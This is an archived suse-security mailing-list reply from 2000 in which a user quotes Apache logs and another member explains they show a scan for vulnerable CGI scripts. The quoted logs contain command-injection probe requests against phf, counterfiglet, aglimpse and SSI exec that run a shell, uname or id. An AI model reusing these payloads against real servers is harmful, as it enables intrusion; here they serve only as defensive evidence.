|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: [suse-security] Web server security holes ?
From: Francisco M. Marzoa Alonso (fmmarzoa
idecnet.com)Date: Wed Apr 05 2000 - 03:06:50 CDT
- Next message: Harald Scharf: "AW: [suse-security] Web server security holes ?"
- Previous message: Oliver Grube: "RE: [suse-security] Web server security holes ?"
- In reply to: Marc Baaden: "[suse-security] Web server security holes ?"
- Reply: Francisco M. Marzoa Alonso: "Re: [suse-security] Web server security holes ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
It seems for me like a bad guy was scanning your web server for vulnerable CGI scripts, but don't panic, he couldn't find nothing.
Have a good one.
Marc Baaden wrote:
> Dear All,
>
> I am quite concerned about security, and I think my machine is doing well
> with respect to all usual services as telnet, FTP, etc...
>
> Unfortunately I am not very experienced with web servers, and have the standard
> features of SuSE 6.3 installed (Apache, I think).
> On two of my machines I got the following log entries in http.acces_log/
> error_log
>
> - What does it mean ?
> - Is it dangerous for the machine ?
> - Can I further secure my machine ?
> PS: I do NOT need the machine beeing accessible by external machines in HTTP
>
> Thank you for explaining these things to me ...
>
> 131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
> 131.155.14.130 - - [19/Mar/2000:07:09:12 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
> 128.175.13.74 - - [19/Mar/2000:17:43:12 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 376
> 128.175.13.74 - - [20/Mar/2000:03:46:42 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 200 482
> 128.175.13.74 - - [20/Mar/2000:06:07:22 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 280
> 128.175.13.74 - - [20/Mar/2000:07:02:50 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 404 346
> 128.175.13.74 - - [21/Mar/2000:00:50:01 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 281
> 128.175.13.74 - - [21/Mar/2000:06:33:15 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 279
> 128.175.13.74 - - [21/Mar/2000:07:17:24 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 282
> 128.175.13.74 - - [21/Mar/2000:08:32:59 +0100] "GET /%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E/index.html HTTP/1.0" 404 316
>
> [Sun Mar 19 17:43:12 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/counterfiglet
> [Mon Mar 20 06:07:22 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/phf
> [Mon Mar 20 07:02:50 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/aglimpse
> [Tue Mar 21 00:50:01 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/perl
> [Tue Mar 21 06:33:15 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/sh
> [Tue Mar 21 07:17:24 2000] [error] [client 128.175.13.74] script not found or unable to stat: /usr/local/httpd/cgi-bin/query
>
> [Thu Mar 30 22:34:16 2000] [notice] Apache/1.3.9 (Unix) (SuSE/Linux) mod_perl/1.21 PHP/3.0.12 configured -- resuming normal operations
> [Thu Mar 30 22:34:16 2000] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
> [
>
> Marc Baaden
> --
> Marc Baaden - Labo MSM (UMR 7551) - http://crypt.u-strasbg.fr/marc
> mailto:baadenchimie.u-strasbg.fr - FAX (+49) 89 24 43 1 68 68
> ICQ# 11466242 - Tel: (+33) 3 88 41 60 86 or (+33) 6 09 84 32 17
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: suse-security-unsubscribesuse.com
> For additional commands, e-mail: suse-security-helpsuse.com
-- Francisco M. Marzoa Alonso Nuevo Mundo - Dpto. Informático ICQ#: 62850923 Henri Dunant, 19 - 28036 Madrid tfno: +34 91 343 18 40 ext. 207 España / Spain fax: +34 91 350 28 45--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe
- Next message: Harald Scharf: "AW: [suse-security] Web server security holes ?"
- Previous message: Oliver Grube: "RE: [suse-security] Web server security holes ?"
- In reply to: Marc Baaden: "[suse-security] Web server security holes ?"
- Reply: Francisco M. Marzoa Alonso: "Re: [suse-security] Web server security holes ?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]